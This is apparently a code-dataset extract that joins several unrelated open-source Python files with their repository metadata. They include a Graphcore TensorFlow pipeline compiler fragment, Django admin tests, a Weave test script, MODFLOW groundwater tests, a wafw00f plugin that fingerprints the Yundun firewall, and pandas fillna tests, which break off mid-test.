opt = opt_fn.opt
# Enqueue loss or any output tensors to the outfeed.
if outfeed_loss:
if not outfeed_queue:
raise ValueError(
"An outfeed_queue must be provided when outfeed_loss is True")
control_outputs.append(outfeed_queue.enqueue(opt_fn.loss))
elif outputs:
if not outfeed_queue:
raise ValueError(
"The last computational stage has tensor outputs: %s, but no"
" outfeed_queue has been provided." %
(', '.join(str(t) for t in outputs)))
control_outputs.append(outfeed_queue.enqueue(outputs))
# Call the compute gradients function - this will be automatically put
# into pipeline stages.
grads_and_vars = opt.compute_gradients(loss)
# Insert gradient accumulation ops.
accumulated_grads_and_vars = []
for grad, var in grads_and_vars:
if grad is not None:
with ops.colocate_with(grad):
# Create an accumulator - variable is used as reference for shape/layout.
accumulator = gen_poputil_ops.gradient_accumulator_create(var)
# Add the gradients to the accumulator.
accumulator = gen_poputil_ops.gradient_accumulator_add(
accumulator, grad)
# Sink the accumulators.
grad = gen_poputil_ops.gradient_accumulator_sink(
accumulator, num_mini_batches=pipeline_depth)
# Use the accumulated gradients.
accumulated_grads_and_vars.append((grad, var))
# Create an explicit function call for the apply gradients - note that we
    # allow external captures here.
apply_grad_ops = []
def resource_update_():
apply_grads = opt.apply_gradients(accumulated_grads_and_vars)
apply_grad_ops.append(apply_grads)
with ops.name_scope(name + "/WU") as scope:
func_graph, captured_args = functional_ops._compile_function( # pylint: disable=protected-access
resource_update_, [], scope, apply_grad_ops, True)
# Create the pipeline resource update stage and lower the function into XLA.
with ops.control_dependencies(list(func_graph.control_captures)):
outputs = gen_functional_ops.resource_update(
captured_args,
to_apply=util.create_new_tf_function(func_graph),
Tout=func_graph.output_types,
output_shapes=func_graph.output_shapes,
offload_weight_update_variables=offload_weight_update_variables,
num_batches_to_accumulate=pipeline_depth)
if not isinstance(outputs, ops.Operation):
if not outfeed_queue:
raise ValueError(
"The last computational stage has tensor outputs: %s, but no"
" outfeed_queue has been provided." % (', '.join(
str(t) for t in functional_ops._convert_to_list(outputs)))) # pylint: disable=protected-access
else:
raise ValueError(
"Expected the pipeline resource update stage to output a "
"tf.Operation, got %s instead." % (str(output)))
control_outputs.append(outputs)
with ops.name_scope(name) as scope:
# pylint: disable=protected-access
try:
func_graph, captured_args = functional_ops._compile_function(
_pipeline, inputs, scope, control_outputs)
except functional_ops._InvalidCaptureException as e:
raise ValueError(
"Trying to capture the tensor %s which is not a resource. This tensor"
" needs to be passed as either part of the `input` or `infeed_queue`"
" of the pipeline." % (str(e)))
# pylint: enable=protected-access
# Create the pipeline and lower the function into XLA.
with ops.control_dependencies(list(func_graph.control_captures)):
output = gen_functional_ops.pipeline(
captured_args,
to_apply=util.create_new_tf_function(func_graph),
Tout=func_graph.output_types,
output_shapes=func_graph.output_shapes,
pipeline_depth=pipeline_depth,
repeat_count=repeat_count,
schedule=int(pipeline_schedule),
pipeline_poplar_config=json_format.MessageToJson(
pipeline_poplar_config))
if not isinstance(output, ops.Operation):
raise ValueError(
"Expected the pipeline to output a tf.Operation, got %s instead." %
(str(output)))
return output
def _pipeline_stage(func,
stage_id,
device_id,
args,
infeed_queue=None,
outfeed_queue=None,
name=None):
"""Internal function for compiling a pipeline stage. This should not be called
directly and doing so will result in undefined behaviour.
Creates a pipeline stage.
Args:
func: function which will be executed as a stage.
stage_id: Stage number.
device_id: IPU the stage will be mapped to.
args: arguments to the function.
infeed_queue: optional IPUInfeedQueue, if passed, it is dequeued as part of
this function.
outfeed_queue: optional IPUOutfeedQueue, if passed, it is enqueued as part
of this function.
    name: name of this pipeline stage.
Returns:
    The values after executing func(args), or the control dependency if
outfeed_queue is not None.
"""
name = name if name else "pipeline_stage"
args = functional_ops._convert_to_list(args) # pylint: disable=protected-access
func_to_compile = func
control_outputs = []
# If we have an infeed, then we wrap the function in another function which
# dequeues the infeed.
if infeed_queue:
def infeed_func_wrapper(*args):
args = functional_ops._convert_to_list(args) # pylint: disable=protected-access
dequeue_ops = functional_ops._convert_to_list(infeed_queue._dequeue()) # pylint: disable=protected-access
# Deal with the dequeue depending on whether it's a list or dict.
if len(dequeue_ops) == 1 and isinstance(dequeue_ops[0], dict):
kwargs = dequeue_ops[0]
return func(*(args), **kwargs)
return func(*(args + dequeue_ops))
func_to_compile = infeed_func_wrapper
# If we have an outfeed, then we wrap the function in another function which
# enqueues the outfeed.
if outfeed_queue:
func = func_to_compile
def outfeed_func_wrapper(*args, **kwargs):
outputs = func(*args, **kwargs)
# Check if there are output tensors - if there are then enqueue them.
if not isinstance(outputs, ops.Operation):
if not isinstance(outputs, dict):
outputs = functional_ops._convert_to_list(outputs) # pylint: disable=protected-access
outputs = outfeed_queue.enqueue(outputs)
control_outputs.append(outputs)
func_to_compile = outfeed_func_wrapper
with ops.name_scope(name) as scope:
# pylint: disable=protected-access
try:
func_graph, captured_args = functional_ops._compile_function(
func_to_compile, args, scope, control_outputs)
except functional_ops._InvalidCaptureException as e:
raise ValueError(
"Trying to capture the tensor %s which is not a resource. This tensor"
" needs to be passed as either part of the `input` or `infeed_queue`"
" of the pipeline." % (str(e)))
# pylint: enable=protected-access
# Create the pipeline stage and lower the function into XLA.
with ops.control_dependencies(list(func_graph.control_captures)):
with scopes.ipu_shard(device_id):
outputs = gen_functional_ops.pipeline_stage(
captured_args,
to_apply=util.create_new_tf_function(func_graph),
Tout=func_graph.output_types,
output_shapes=func_graph.output_shapes,
stage_id=stage_id)
if isinstance(outputs, ops.Operation):
return outputs
return func_graph_module.pack_sequence_as(func_graph.structured_outputs,
outputs)
| 42.553451
| 112
| 0.705854
|
c2d7fda69d41540373249fbd989048982b52cfbf
| 1,392
|
py
|
Python
|
app/core/tests/test_admin.py
|
mamirjamali/recepe_lon_dev
|
cacb5e14f11b10b48bfe3b8592174058e9607ee2
|
[
"MIT"
] | null | null | null |
app/core/tests/test_admin.py
|
mamirjamali/recepe_lon_dev
|
cacb5e14f11b10b48bfe3b8592174058e9607ee2
|
[
"MIT"
] | null | null | null |
app/core/tests/test_admin.py
|
mamirjamali/recepe_lon_dev
|
cacb5e14f11b10b48bfe3b8592174058e9607ee2
|
[
"MIT"
] | null | null | null |
# from django import urls
from django.test import TestCase, Client
from django.contrib.auth import get_user_model
from django.urls import reverse
class AdminSiteTests(TestCase):
def setUp(self):
self.client = Client()
self.admin_user = get_user_model().objects.create_superuser(
email="admin@enviroble.com",
password="12qwaszxxzsa"
)
self.client.force_login(self.admin_user)
self.user = get_user_model().objects.create_user(
email="test@enviroble.com",
password="12qwaszxxzsa",
name="Test user full name"
)
def test_user_listed(self):
"""Test if users are listed in user page"""
url = reverse('admin:core_user_changelist')
res = self.client.get(url)
self.assertContains(res, self.user.name)
self.assertContains(res, self.user.email)
def test_user_change_page(self):
"""Test that the user edit page works"""
url = reverse('admin:core_user_change', args=[self.user.id])
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
def test_create_user_page(self):
"""Test that the create user page works"""
url = reverse('admin:core_user_add')
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
| 32.372093
| 69
| 0.624282
|
42e696aa6c7e63f4b6ed0b4030965dff515ec2d8
| 5,920
|
py
|
Python
|
src/test-apps/happy/bin/weave-wdm-next.py
|
aiw-google/openweave-core
|
5dfb14b21d0898ef95bb62ff564cadfeea4b4702
|
[
"Apache-2.0"
] | 1
|
2021-08-10T12:08:31.000Z
|
2021-08-10T12:08:31.000Z
|
src/test-apps/happy/bin/weave-wdm-next.py
|
aiw-google/openweave-core
|
5dfb14b21d0898ef95bb62ff564cadfeea4b4702
|
[
"Apache-2.0"
] | 1
|
2019-03-26T04:47:32.000Z
|
2019-03-26T04:47:32.000Z
|
src/test-apps/happy/bin/weave-wdm-next.py
|
aiw-google/openweave-core
|
5dfb14b21d0898ef95bb62ff564cadfeea4b4702
|
[
"Apache-2.0"
] | 1
|
2021-03-16T03:22:52.000Z
|
2021-03-16T03:22:52.000Z
|
#!/usr/bin/env python
#
# Copyright (c) 2016-2017 Nest Labs, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# @file
# A Happy command line utility that tests Weave Wdm Next among Weave nodes.
#
#    The command is executed by instantiating and running the WeaveWdmNext class.
#
import getopt
import sys
import set_test_path
from happy.Utils import *
import WeaveWdmNext
helpstring = \
"""
weave-wdm-next [-h --help] [-q --quiet] [-o --origin <NAME>] [-s --server <NAME>] [-t --tap <TAP_INTERFACE>]
[-w --wdm_option <wdm_option>] [-t --test_case <test_case>] [--test_client_case <case_id>] [--total_client_count <count>]
[--final_client_status <status>][--timer_client_period <period>] [--enable_client_stop][--test_client_iterations <iterations>]
[--test_client_delay <delay_time>] [--enable_client_flip][--save_client_perf][--test_server_case <case_id>]
[--total_server_count <count>][--final_server_status <status>]
[--timer_server_period <period>][--enable_server_stop][--test_server_iterations <iterations>]
[--test_server_delay <delay_time>][--enable_server_flip][--save_server_perf][--test_focus_client]
[--case][--case_cert_path <path>][--case_key_path <path>][--group_enc][--group_enc_key_id <key>]
return:
True or False for test
"""
if __name__ == "__main__":
options = WeaveWdmNext.option()
try:
opts, args = getopt.getopt(sys.argv[1:], "ho:s:qt:w:",
["help", "origin=", "server=", "quiet", "tap=", "wdm_option=",
"test_client_case=", "total_client_count=", "final_client_status=", "timer_client_period=",
"enable_client_stop=", "test_client_iterations=", "test_client_delay=","enable_client_flip=",
"save_client_perf="
"test_server_case=", "total_server_count=", "final_server_status=", "timer_server_period=",
"enable_server_stop=", "test_server_iterations=", "test_server_delay=", "enable_server_flip=",
"save_server_perf=", "swap_role=", "case", "case_cert_path=", "case_key_path=", "group_enc", "group_enc_key_id="])
except getopt.GetoptError as err:
        print(WeaveWdmNext.WeaveWdmNext.__doc__)
        print(hred(str(err)))
        sys.exit(hred("%s: Failed to parse arguments." % (__file__)))
for o, a in opts:
if o in ("-h", "--help"):
            print(helpstring)
sys.exit(0)
elif o in ("-q", "--quiet"):
options["quiet"] = True
elif o in ("-o", "--origin"):
options["client"] = a
elif o in ("-s", "--server"):
options["server"] = a
elif o in ("-t", "--tap"):
options["tap"] = a
elif o in ("-w", "--wdm_option"):
options["wdm_option"] = a
elif o in ("--test_client_case"):
options["test_client_case"] = int(a)
elif o in ("--total_client_count"):
options["total_client_count"] = int(a)
elif o in ("--final_client_status"):
options["final_client_status"] = int(a)
elif o in ("--timer_client_period"):
options["timer_client_period"] = int(a)
elif o in ("--enable_client_stop"):
options["enable_client_stop"] = int(a)
elif o in ("--test_client_iterations"):
options["test_client_iterations"] = int(a)
elif o in ("--test_client_delay"):
options["test_client_delay"] = int(a)
elif o in ("--enable_client_flip"):
options["enable_client_flip"] = int(a)
elif o in ("--save_client_perf"):
options["save_client_perf"] = int(a)
elif o in ("--test_server_case"):
options["test_server_case"] = int(a)
elif o in ("--total_server_count"):
options["total_server_count"] = int(a)
elif o in ("--final_server_status"):
options["final_server_status"] = int(a)
elif o in ("--timer_server_period"):
options["timer_server_period"] = int(a)
elif o in ("--enable_server_stop"):
options["enable_server_stop"] = int(a)
elif o in ("--test_server_iterations"):
options["test_server_iterations"] = int(a)
elif o in ("--test_server_delay"):
options["test_server_delay"] = int(a)
elif o in ("--enable_server_flip"):
options["enable_server_flip"] = int(a)
elif o in ("--save_server_perf"):
options["save_server_perf"] = int(a)
elif o in ("--test_focus_client"):
options["swap_role"] = int(a)
elif o in ("--case"):
options["case"] = True
elif o in ("--case_cert_path"):
options["case_cert_path"] = a
elif o in ("--case_key_path"):
options["case_key_path"] = a
elif o in ("--group_enc"):
options["group_enc"] = True
elif o in ("--group_enc_key_id"):
options["group_enc_key_id"] = a
else:
            print(hred(str(o) + " cannot be recognized"))
assert False, "unhandled option"
if len(args) == 1:
options["origin"] = args[0]
if len(args) == 2:
options["client"] = args[0]
options["server"] = args[1]
cmd = WeaveWdmNext.WeaveWdmNext(options)
cmd.start()
| 33.828571
| 130
| 0.594932
|
78de2df810210edf97d812e13e2fe4619e6d4d86
| 6,066
|
py
|
Python
|
autotest/test_gwf_csub_sub02.py
|
MODFLOW-USGS/modflow6
|
6cc0f91b93e0615b68c9239c32cd5bff7f0696b9
|
[
"CC0-1.0"
] | 102
|
2017-12-19T09:56:38.000Z
|
2022-03-30T01:47:28.000Z
|
autotest/test_gwf_csub_sub02.py
|
MODFLOW-USGS/modflow6
|
6cc0f91b93e0615b68c9239c32cd5bff7f0696b9
|
[
"CC0-1.0"
] | 331
|
2018-01-10T21:22:48.000Z
|
2022-03-29T05:57:00.000Z
|
autotest/test_gwf_csub_sub02.py
|
MODFLOW-USGS/modflow6
|
6cc0f91b93e0615b68c9239c32cd5bff7f0696b9
|
[
"CC0-1.0"
] | 87
|
2017-12-13T21:40:39.000Z
|
2022-03-30T05:31:40.000Z
|
import os
import pytest
try:
import pymake
except:
msg = "Error. Pymake package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install https://github.com/modflowpy/pymake/zipball/master"
raise Exception(msg)
try:
import flopy
except:
msg = "Error. FloPy package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install flopy"
raise Exception(msg)
from framework import testing_framework, running_on_CI
from simulation import Simulation
ex = [
"csub_sub02a",
"csub_sub02b",
"csub_sub02c",
"csub_sub02d",
"csub_sub02e",
]
exdirs = []
for s in ex:
exdirs.append(os.path.join("temp", s))
ddir = "data"
cmppth = "mf6-regression"
cg_ske = 1.14e-3 / (500.0 - 20.0)
cg_S = cg_ske * (500.0 - 20.0)
ss = [cg_S, cg_S, cg_ske, cg_ske, cg_S]
storagecoeff = [True, True, False, False, True]
cdelay = [False, True, False, True, True]
ndelaycells = [None, 19, None, 19, 19]
# run all examples on Travis
continuous_integration = [True for e in ex]
# set replace_exe to None to use default executable
replace_exe = None
# static model data
nlay, nrow, ncol = 1, 1, 1
nper = 10
perlen = [182.625 for i in range(nper)]
nstp = [10 for i in range(nper)]
tsmult = [1.05 for i in range(nper)]
steady = [False for i in range(nper)]
delr, delc = 1000.0, 1000.0
top = -100.0
botm = [-600.0]
strt = 0.0
hnoflo = 1e30
hdry = -1e30
hk = 1e6
laytyp = [0]
sy = 0.0
nouter, ninner = 1000, 300
hclose, rclose, relax = 1e-6, 1e-6, 0.97
tdis_rc = []
for idx in range(nper):
tdis_rc.append((perlen[idx], nstp[idx], tsmult[idx]))
ib = 1
wd = {}
wd6 = {}
for i in range(nper):
if i % 2 == 0:
q = -118.3
else:
q = 23.66
d = [[0, 0, 0, q]]
d6 = [[(0, 0, 0), q]]
wd[i] = d
wd6[i] = d6
# sub data
cc = 0.005
cr = 5e-5
void = 0.82
theta = void / (1.0 + void)
kv = 9.72e-6
sgm = 0.0
sgs = 0.0
ini_stress = 0.0
thick = [20.0]
sfe = cr * thick[0]
sfv = cc * thick[0]
lnd = [0]
ldnd = [0]
dp = [[kv, cr, cc]]
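# For reference (values follow directly from the definitions above): the
# porosity computed from the void ratio is theta = 0.82 / 1.82 ~= 0.4505, and
# the interbed storage coefficients are sfe = cr * 20 = 1.0e-3 and
# sfv = cc * 20 = 0.1.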
def get_model(idx, ws):
name = ex[idx]
ss = 1.14e-3
sc6 = True
if not storagecoeff[idx]:
ss /= top - botm[0]
sc6 = None
if cdelay[idx]:
cdelays = "delay"
else:
cdelays = "nodelay"
sub6 = [
[
0,
(0, 0, 0),
cdelays,
ini_stress,
thick[0],
1.0,
cc,
cr,
theta,
kv,
0.0,
"db01",
]
]
# build MODFLOW 6 files
sim = flopy.mf6.MFSimulation(
sim_name=name, version="mf6", exe_name="mf6", sim_ws=ws
)
# create tdis package
tdis = flopy.mf6.ModflowTdis(sim, time_units="DAYS", nper=nper, perioddata=tdis_rc)
# create iterative model solution
ims = flopy.mf6.ModflowIms(
sim,
print_option="SUMMARY",
outer_dvclose=hclose,
outer_maximum=nouter,
under_relaxation="NONE",
inner_maximum=ninner,
inner_dvclose=hclose,
rcloserecord=rclose,
linear_acceleration="CG",
scaling_method="NONE",
reordering_method="NONE",
relaxation_factor=relax,
)
# create gwf model
gwf = flopy.mf6.ModflowGwf(
sim, modelname=name, model_nam_file="{}.nam".format(name)
)
dis = flopy.mf6.ModflowGwfdis(
gwf,
nlay=nlay,
nrow=nrow,
ncol=ncol,
delr=delr,
delc=delc,
top=top,
botm=botm,
filename="{}.dis".format(name),
)
# initial conditions
ic = flopy.mf6.ModflowGwfic(gwf, strt=strt, filename="{}.ic".format(name))
# node property flow
npf = flopy.mf6.ModflowGwfnpf(gwf, save_flows=False, icelltype=laytyp, k=hk, k33=hk)
# storage
sto = flopy.mf6.ModflowGwfsto(
gwf,
save_flows=False,
iconvert=laytyp,
ss=0.0,
sy=sy,
storagecoefficient=sc6,
transient={0: True},
)
# wel files
wel = flopy.mf6.ModflowGwfwel(
gwf,
print_input=True,
print_flows=True,
maxbound=1,
stress_period_data=wd6,
save_flows=False,
)
# csub files
csub = flopy.mf6.ModflowGwfcsub(
gwf,
print_input=True,
boundnames=True,
head_based=True,
ndelaycells=ndelaycells[idx],
ninterbeds=1,
beta=0.0,
cg_ske_cr=cg_ske,
packagedata=sub6,
)
# output control
oc = flopy.mf6.ModflowGwfoc(
gwf,
budget_filerecord="{}.cbc".format(name),
head_filerecord="{}.hds".format(name),
headprintrecord=[("COLUMNS", 10, "WIDTH", 15, "DIGITS", 6, "GENERAL")],
saverecord=[("HEAD", "LAST")],
printrecord=[("HEAD", "LAST"), ("BUDGET", "LAST")],
)
return sim
def build_model(idx, dir):
ws = dir
sim = get_model(idx, ws)
ws = os.path.join(dir, cmppth)
mc = get_model(idx, ws)
return sim, mc
# - No need to change any code below
@pytest.mark.parametrize(
"idx, dir",
list(enumerate(exdirs)),
)
def test_mf6model(idx, dir):
# determine if running on Travis or GitHub actions
is_CI = running_on_CI()
# initialize testing framework
test = testing_framework()
# build the models
test.build_mf6_models(build_model, idx, dir)
if is_CI and not continuous_integration[idx]:
return
# run the test model
test.run_mf6(Simulation(dir, mf6_regression=True))
def main():
# initialize testing framework
test = testing_framework()
# run the test model
    for idx, dir in enumerate(exdirs):
        test.build_mf6_models(build_model, idx, dir)
sim = Simulation(
dir,
mf6_regression=True,
)
test.run_mf6(sim)
return
# use python test_gwf_csub_sub02.py --mf2005 mf2005devdbl
if __name__ == "__main__":
# print message
print("standalone run of {}".format(os.path.basename(__file__)))
# run main routine
main()
| 21.587189
| 88
| 0.582756
|
99e7947b1f7a4a9ffacb53e759e438f392cd4df6
| 860
|
py
|
Python
|
Worker/WebCheck/wafw00f/plugins/yundun.py
|
p4sschen/Toy4Recon
|
e4fa6a512b238cca6d6d072ed5c66899de60bb06
|
[
"MIT"
] | 1
|
2020-12-16T13:14:05.000Z
|
2020-12-16T13:14:05.000Z
|
Worker/WebCheck/wafw00f/plugins/yundun.py
|
p4sschen/Toy4Recon
|
e4fa6a512b238cca6d6d072ed5c66899de60bb06
|
[
"MIT"
] | null | null | null |
Worker/WebCheck/wafw00f/plugins/yundun.py
|
p4sschen/Toy4Recon
|
e4fa6a512b238cca6d6d072ed5c66899de60bb06
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
NAME = 'Yundun (Yundun)'
def is_waf(self):
# Yundun has its own server header set
if self.matchheader(('Server', 'YUNDUN')):
return True
# X-Cache too sometimes
if self.matchheader(('X-Cache', 'YUNDUN')):
return True
# Found more fingerprints for Yundun during testing phase
if self.matchcookie(r'^yd_cookie='):
return True
for attack in self.attacks:
r = attack(self)
if r is None:
return
_, page = r
        # Yundun serves a characteristic block page; these additional unique
        # fingerprints were found during the testing phase.
if any(i in page for i in (b'Blocked by YUNDUN Cloud WAF', b'yundun.com/yd_http_error/',
b'www.yundun.com/static/js/fingerprint2.js')):
return True
return False
| 30.714286
| 96
| 0.601163
|
7174283494fe7547add9ca626c1d3283e31a77b7
| 43,414
|
py
|
Python
|
pandas/tests/series/test_missing.py
|
lorenzocestaro/pandas
|
a73e4518cf3d10fd239cdbd1be3bcda43443bf2a
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause"
] | null | null | null |
pandas/tests/series/test_missing.py
|
lorenzocestaro/pandas
|
a73e4518cf3d10fd239cdbd1be3bcda43443bf2a
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause"
] | null | null | null |
pandas/tests/series/test_missing.py
|
lorenzocestaro/pandas
|
a73e4518cf3d10fd239cdbd1be3bcda43443bf2a
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause"
] | null | null | null |
# coding=utf-8
# pylint: disable-msg=E1101,W0612
import pytz
from datetime import timedelta, datetime
from distutils.version import LooseVersion
from numpy import nan
import numpy as np
import pandas as pd
from pandas import (Series, DataFrame, isnull, date_range,
MultiIndex, Index, Timestamp, NaT)
from pandas.compat import range
from pandas._libs.tslib import iNaT
from pandas.util.testing import assert_series_equal, assert_frame_equal
import pandas.util.testing as tm
from .common import TestData
try:
import scipy
_is_scipy_ge_0190 = scipy.__version__ >= LooseVersion('0.19.0')
except:
_is_scipy_ge_0190 = False
def _skip_if_no_pchip():
try:
from scipy.interpolate import pchip_interpolate # noqa
except ImportError:
import pytest
pytest.skip('scipy.interpolate.pchip missing')
def _skip_if_no_akima():
try:
from scipy.interpolate import Akima1DInterpolator # noqa
except ImportError:
import pytest
pytest.skip('scipy.interpolate.Akima1DInterpolator missing')
def _simple_ts(start, end, freq='D'):
rng = date_range(start, end, freq=freq)
return Series(np.random.randn(len(rng)), index=rng)
class TestSeriesMissingData(TestData, tm.TestCase):
def test_timedelta_fillna(self):
# GH 3371
s = Series([Timestamp('20130101'), Timestamp('20130101'), Timestamp(
'20130102'), Timestamp('20130103 9:01:01')])
td = s.diff()
# reg fillna
result = td.fillna(0)
expected = Series([timedelta(0), timedelta(0), timedelta(1), timedelta(
days=1, seconds=9 * 3600 + 60 + 1)])
assert_series_equal(result, expected)
        # interpreted as seconds
result = td.fillna(1)
expected = Series([timedelta(seconds=1), timedelta(0), timedelta(1),
timedelta(days=1, seconds=9 * 3600 + 60 + 1)])
assert_series_equal(result, expected)
result = td.fillna(timedelta(days=1, seconds=1))
expected = Series([timedelta(days=1, seconds=1), timedelta(
0), timedelta(1), timedelta(days=1, seconds=9 * 3600 + 60 + 1)])
assert_series_equal(result, expected)
result = td.fillna(np.timedelta64(int(1e9)))
expected = Series([timedelta(seconds=1), timedelta(0), timedelta(1),
timedelta(days=1, seconds=9 * 3600 + 60 + 1)])
assert_series_equal(result, expected)
result = td.fillna(NaT)
expected = Series([NaT, timedelta(0), timedelta(1),
timedelta(days=1, seconds=9 * 3600 + 60 + 1)],
dtype='m8[ns]')
assert_series_equal(result, expected)
# ffill
td[2] = np.nan
result = td.ffill()
expected = td.fillna(0)
expected[0] = np.nan
assert_series_equal(result, expected)
# bfill
td[2] = np.nan
result = td.bfill()
expected = td.fillna(0)
expected[2] = timedelta(days=1, seconds=9 * 3600 + 60 + 1)
assert_series_equal(result, expected)
def test_datetime64_fillna(self):
s = Series([Timestamp('20130101'), Timestamp('20130101'), Timestamp(
'20130102'), Timestamp('20130103 9:01:01')])
s[2] = np.nan
# reg fillna
result = s.fillna(Timestamp('20130104'))
expected = Series([Timestamp('20130101'), Timestamp(
'20130101'), Timestamp('20130104'), Timestamp('20130103 9:01:01')])
assert_series_equal(result, expected)
result = s.fillna(NaT)
expected = s
assert_series_equal(result, expected)
# ffill
result = s.ffill()
expected = Series([Timestamp('20130101'), Timestamp(
'20130101'), Timestamp('20130101'), Timestamp('20130103 9:01:01')])
assert_series_equal(result, expected)
# bfill
result = s.bfill()
expected = Series([Timestamp('20130101'), Timestamp('20130101'),
Timestamp('20130103 9:01:01'), Timestamp(
'20130103 9:01:01')])
assert_series_equal(result, expected)
# GH 6587
# make sure that we are treating as integer when filling
# this also tests inference of a datetime-like with NaT's
s = Series([pd.NaT, pd.NaT, '2013-08-05 15:30:00.000001'])
expected = Series(
['2013-08-05 15:30:00.000001', '2013-08-05 15:30:00.000001',
'2013-08-05 15:30:00.000001'], dtype='M8[ns]')
result = s.fillna(method='backfill')
assert_series_equal(result, expected)
def test_datetime64_tz_fillna(self):
for tz in ['US/Eastern', 'Asia/Tokyo']:
# DatetimeBlock
s = Series([Timestamp('2011-01-01 10:00'), pd.NaT,
Timestamp('2011-01-03 10:00'), pd.NaT])
null_loc = pd.Series([False, True, False, True])
result = s.fillna(pd.Timestamp('2011-01-02 10:00'))
expected = Series([Timestamp('2011-01-01 10:00'),
Timestamp('2011-01-02 10:00'),
Timestamp('2011-01-03 10:00'),
Timestamp('2011-01-02 10:00')])
self.assert_series_equal(expected, result)
# check s is not changed
self.assert_series_equal(pd.isnull(s), null_loc)
result = s.fillna(pd.Timestamp('2011-01-02 10:00', tz=tz))
expected = Series([Timestamp('2011-01-01 10:00'),
Timestamp('2011-01-02 10:00', tz=tz),
Timestamp('2011-01-03 10:00'),
Timestamp('2011-01-02 10:00', tz=tz)])
self.assert_series_equal(expected, result)
self.assert_series_equal(pd.isnull(s), null_loc)
result = s.fillna('AAA')
expected = Series([Timestamp('2011-01-01 10:00'), 'AAA',
Timestamp('2011-01-03 10:00'), 'AAA'],
dtype=object)
self.assert_series_equal(expected, result)
self.assert_series_equal(pd.isnull(s), null_loc)
result = s.fillna({1: pd.Timestamp('2011-01-02 10:00', tz=tz),
3: pd.Timestamp('2011-01-04 10:00')})
expected = Series([Timestamp('2011-01-01 10:00'),
Timestamp('2011-01-02 10:00', tz=tz),
Timestamp('2011-01-03 10:00'),
Timestamp('2011-01-04 10:00')])
self.assert_series_equal(expected, result)
self.assert_series_equal(pd.isnull(s), null_loc)
result = s.fillna({1: pd.Timestamp('2011-01-02 10:00'),
3: pd.Timestamp('2011-01-04 10:00')})
expected = Series([Timestamp('2011-01-01 10:00'),
Timestamp('2011-01-02 10:00'),
Timestamp('2011-01-03 10:00'),
Timestamp('2011-01-04 10:00')])
self.assert_series_equal(expected, result)
self.assert_series_equal(pd.isnull(s), null_loc)
# DatetimeBlockTZ
idx = pd.DatetimeIndex(['2011-01-01 10:00', pd.NaT,
'2011-01-03 10:00', pd.NaT], tz=tz)
s = pd.Series(idx)
self.assertEqual(s.dtype, 'datetime64[ns, {0}]'.format(tz))
self.assert_series_equal(pd.isnull(s), null_loc)
result = s.fillna(pd.Timestamp('2011-01-02 10:00'))
expected = Series([Timestamp('2011-01-01 10:00', tz=tz),
Timestamp('2011-01-02 10:00'),
Timestamp('2011-01-03 10:00', tz=tz),
Timestamp('2011-01-02 10:00')])
self.assert_series_equal(expected, result)
self.assert_series_equal(pd.isnull(s), null_loc)
result = s.fillna(pd.Timestamp('2011-01-02 10:00', tz=tz))
idx = pd.DatetimeIndex(['2011-01-01 10:00', '2011-01-02 10:00',
'2011-01-03 10:00', '2011-01-02 10:00'],
tz=tz)
expected = Series(idx)
self.assert_series_equal(expected, result)
self.assert_series_equal(pd.isnull(s), null_loc)
result = s.fillna(pd.Timestamp('2011-01-02 10:00',
tz=tz).to_pydatetime())
idx = pd.DatetimeIndex(['2011-01-01 10:00', '2011-01-02 10:00',
'2011-01-03 10:00', '2011-01-02 10:00'],
tz=tz)
expected = Series(idx)
self.assert_series_equal(expected, result)
self.assert_series_equal(pd.isnull(s), null_loc)
result = s.fillna('AAA')
expected = Series([Timestamp('2011-01-01 10:00', tz=tz), 'AAA',
Timestamp('2011-01-03 10:00', tz=tz), 'AAA'],
dtype=object)
self.assert_series_equal(expected, result)
self.assert_series_equal(pd.isnull(s), null_loc)
result = s.fillna({1: pd.Timestamp('2011-01-02 10:00', tz=tz),
3: pd.Timestamp('2011-01-04 10:00')})
expected = Series([Timestamp('2011-01-01 10:00', tz=tz),
Timestamp('2011-01-02 10:00', tz=tz),
Timestamp('2011-01-03 10:00', tz=tz),
Timestamp('2011-01-04 10:00')])
self.assert_series_equal(expected, result)
self.assert_series_equal(pd.isnull(s), null_loc)
result = s.fillna({1: pd.Timestamp('2011-01-02 10:00', tz=tz),
3: pd.Timestamp('2011-01-04 10:00', tz=tz)})
expected = Series([Timestamp('2011-01-01 10:00', tz=tz),
Timestamp('2011-01-02 10:00', tz=tz),
Timestamp('2011-01-03 10:00', tz=tz),
Timestamp('2011-01-04 10:00', tz=tz)])
self.assert_series_equal(expected, result)
self.assert_series_equal(pd.isnull(s), null_loc)
# filling with a naive/other zone, coerce to object
result = s.fillna(Timestamp('20130101'))
expected = Series([Timestamp('2011-01-01 10:00', tz=tz),
Timestamp('2013-01-01'),
Timestamp('2011-01-03 10:00', tz=tz),
Timestamp('2013-01-01')])
self.assert_series_equal(expected, result)
self.assert_series_equal(pd.isnull(s), null_loc)
result = s.fillna(Timestamp('20130101', tz='US/Pacific'))
expected = Series([Timestamp('2011-01-01 10:00', tz=tz),
Timestamp('2013-01-01', tz='US/Pacific'),
Timestamp('2011-01-03 10:00', tz=tz),
Timestamp('2013-01-01', tz='US/Pacific')])
self.assert_series_equal(expected, result)
self.assert_series_equal(pd.isnull(s), null_loc)
def test_datetime64tz_fillna_round_issue(self):
# GH 14872
data = pd.Series([pd.NaT, pd.NaT,
datetime(2016, 12, 12, 22, 24, 6, 100001,
tzinfo=pytz.utc)])
filled = data.fillna(method='bfill')
expected = pd.Series([datetime(2016, 12, 12, 22, 24, 6,
100001, tzinfo=pytz.utc),
datetime(2016, 12, 12, 22, 24, 6,
100001, tzinfo=pytz.utc),
datetime(2016, 12, 12, 22, 24, 6,
